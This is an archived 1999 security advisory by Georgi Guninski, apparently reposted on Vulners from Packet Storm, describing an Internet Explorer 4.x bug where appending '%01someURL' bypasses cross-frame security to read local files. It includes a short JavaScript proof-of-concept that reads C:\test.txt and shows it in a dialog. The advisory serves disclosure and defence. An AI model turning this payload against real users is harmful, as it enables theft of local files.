Lucene search
msie4.x-readfile.txt
🗓️ 17 Aug 1999 00:00:00Reported by Georgi GuninskiType 
packetstorm🔗 packetstormsecurity.com👁 17 Views
IE 4.x file reading bug allows local files to be sent to servers, circumventing security measures.
Show more
`Guninski's IE 4 file reading bug.
http://www.geocities.com/ResearchTriangle/1711/read3.html
There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.
The filename must be known.
The bug may be exploited using HTML mail message. The exploit uses Javascript.
For more info see the source.
Workaround: Disable Javascript.
Written by http://www.geocities.com/ResearchTriangle/1711 - Georgi Guninski
Exploit Code
------------
<SCRIPT>
alert('Create a short file C:\\test.txt and its contents will be shown in a dialog box.')
b=showModalDialog("about:<SCRIPT>a=window.open('file://c:/test.txt');s='Here is your file: \\n\\n'+a.document.body.innerText;alert(s);a.close();close()</"+"SCRIPT>%01file://c:/");
</SCRIPT>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4